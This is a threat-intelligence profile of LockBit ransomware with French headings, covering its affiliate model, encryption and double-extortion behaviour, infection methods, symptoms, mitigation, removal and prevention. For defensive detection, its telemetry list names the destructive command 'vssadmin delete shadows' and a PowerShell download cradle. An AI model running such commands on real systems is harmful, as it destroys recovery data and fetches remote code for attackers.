CritiqueActifTendance
Critical Risk
95%
LockBit Ransomware
Affiliate-based ransomware known for fast encryption and double extortion.
#ransomware#double-extortion#windows
Aperçu de la menace
LockBit operates as a ransomware-as-a-service platform. Affiliates deploy encryptors across networks, exfiltrate sensitive data, and publish leaks to pressure victims into paying ransoms.
Comportement d’attaque
- Mass file encryption using hybrid AES + RSA schemes
- Shadow copy and backup service deletion
- Data exfiltration prior to encryption for double extortion
- Lateral movement via stolen credentials and RDP
Méthodes d’infection
- Phishing attachments
- Exploited VPN or RDP endpoints
- Malicious email links
- Supply-chain compromise
Symptômes et indicateurs
- Renamed files with unusual extensions
- Ransom notes on desktops
- Disabled recovery tools
- Unexpected network traffic spikes
Atténuation immédiate
- Isolate affected endpoints immediately
- Preserve forensic images before cleanup
- Notify legal and incident response teams
- Do not pay ransom without professional guidance
Guide de suppression
- Boot from clean media and scan offline
- Restore from verified offline backups
- Rebuild compromised domain controllers
- Rotate all domain credentials
Méthodes de prévention
- Enable behavioral ransomware protection
- Maintain immutable offline backups
- Patch edge services and disable unused RDP
- Enforce least-privilege access
Indicateurs télémétriques
- vssadmin delete shadows
- Mass .lockbit extension renames
- Suspicious PowerShell download cradle
LockBit campaigns continue through affiliate networks despite law-enforcement disruptions. Treat it as an active high-risk family.